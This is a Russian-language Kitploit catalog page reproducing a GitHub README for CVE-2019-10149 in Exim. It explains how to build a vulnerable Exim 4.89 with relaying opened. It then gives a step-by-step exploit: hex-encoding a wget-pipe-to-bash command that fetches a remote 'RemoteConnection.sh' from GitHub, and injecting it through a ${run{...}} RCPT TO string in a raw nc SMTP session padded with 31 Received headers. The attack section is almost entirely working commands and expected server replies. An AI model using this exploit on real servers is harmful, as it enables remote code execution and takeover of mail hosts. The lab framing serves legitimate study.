Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-10149 — CVE-2019-10149 | Kitploit
Инструменты/GitHubGitHub/hyim0810/cve-2019-10149
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеЛаборатории и Практика
GitHubhyim0810/cve-2019-10149

CVE-2019-10149

CVE-2019-10149

Репозиторий
122 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-10149 - Exim 4.87 < 4.91

Инструкции по установке уязвимой версии Exim и её эксплуатации Проверено на Linux Ubuntu 16.04, Exim 4.89

Установка Exim

Скачайте и распакуйте exim версии 4.89

  • wget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz && tar -xvf exim-4.89.tar.xz

Перейдите в извлечённую папку

  • cd exim-4.89/

Скопируйте и измените необходимые конфигурационные файлы

  • sed -e 's,^EXIM_USER. * $,EXIM_USER=exim,' Local/Makefile src/EDITME > Local/Makefile

  • cp exim_monitor/EDITME Local/eximon.conf

Создайте пользователя и группу exim

  • sudo groupadd -g 31 exim

  • sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim

Установите зависимости

  • sudo apt-get update
  • sudo apt-get install -y make build-essential libpcre3-dev libdb-dev libxt-dev libxaw7-dev

Установите exim 4.89

  • sudo make install

Отредактируйте /usr/exim/configure, чтобы разрешить ретрансляцию, чтобы мы могли эксплуатировать без ожидания 7 дней

  • sudo sed -iz 's/domainlist relay_to_domains =/domainlist relay_to_domains = * /' /usr/exim/configure
  • sudo sed -i '/hostlist relay_from_hosts = localhost/c\hostlist relay_from_hosts = 0.0.0.0' /usr/exim/configure
  • sudo sed -i '/require verify = recipient/c#require verify = recipient' /usr/exim/configure

Запустите exim от пользователя exim

  • sudo -H -u exim /usr/exim/bin/exim -bd -d-receive

Создание эксплойта

Преобразуйте вашу команду оболочки в шестнадцатеричный формат. Пример:

  • /bin/sh -c “wget https://raw.githubusercontent.com/hyim0810/CVE-2019-10149/main/RemoteConnection.sh" -O - | bash
Скачать инструмент
  • \x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fhyim0810\x2FCVE\x2D2019\x2D10149\x2Fmain\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22\
  • Таблица для примера:

    • \t-c\ = -c
    • \t= пробел
    • x20 = пробел
    • x7C = |
    • x2F = /
    • x3A = :
    • x2D = -
    • x3E = >
    • x26 = &
    • x22 = "
    • x2E = .

    Использование эксплойта

    Сначала мы используем nc для подключения к серверу.

    • nc 192.168.0.168 25

    После подключения отправляем HELO.

    • helo localhost
    • (Ответ: 250 exim Hello localhost [192.168.0.168])

    Затем устанавливаем пустой адрес отправителя.

    • mail from:<>
    • (Ответ: 250 OK)

    Затем устанавливаем адрес получателя с нашим полезным грузом, вставив нужную команду вместо многоточия: rcpt to:${run{...}}@localhost.

    • rcpt to:<${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fdarsigovrustam\x2FCVE\x2D2019\x2D10149\x2Fmaster\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22}}@localhost>
    • (Ответ: 250 Accepted)

    И наконец, мы сначала вводим DATA, затем 31 строку, пустую строку и точку.

    • DATA
    • Received: 1
    • Received: 2
    • Received: 3
    • Received: 4
    • Received: 5
    • Received: 6
    • Received: 7
    • Received: 8
    • Received: 9
    • Received: 10
    • Received: 11
    • Received: 12
    • Received: 13
    • Received: 14
    • Received: 15
    • Received: 16
    • Received: 17
    • Received: 18
    • Received: 19
    • Received: 20
    • Received: 21
    • Received: 22
    • Received: 23
    • Received: 24
    • Received: 25
    • Received: 26
    • Received: 27
    • Received: 28
    • Received: 29
    • Received: 30
    • Received: 31
    • .